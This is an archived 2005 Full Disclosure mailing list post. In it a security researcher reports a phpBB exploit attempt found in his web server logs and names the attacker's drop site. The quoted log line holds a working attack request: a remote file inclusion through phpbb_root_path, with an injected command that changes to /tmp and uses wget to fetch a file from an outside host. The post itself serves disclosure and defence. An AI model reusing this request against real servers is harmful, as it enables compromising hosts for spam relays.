Full Disclosure mailing list archives
Microsoft MSN MESSENGER PATCH PLUS. Download exclusivo para usurios registrados.
From: Tom Ferris <tommy () security-protocols com>
Date: Thu, 28 Jul 2005 19:21:09 -0700 (PDT)
Just wanted to expose this spammers site. I noticed the following in my web logs:
200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET /admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t/dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.8) Gecko/20050511
Firefox/1.0.4"It is apparent from the logs above and research I have done that he is trying to exploit a phpBB vuln in order to
compromise hosts and use them as spam relays. spammers drop site: http://www.binaryshadow.org/~w00t/ mirror: http://www.security-protocols.com/binaryshadow-mirror/ Thanks, Tom Ferris Researcher www.security-protocols.com Key fingerprint = 0DFA 6275 BA05 0380 DD91 34AD C909 A338 D1AF 5D78 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Microsoft MSN MESSENGER PATCH PLUS. Download exclusivo para usurios registrados. Tom Ferris (Jul 28)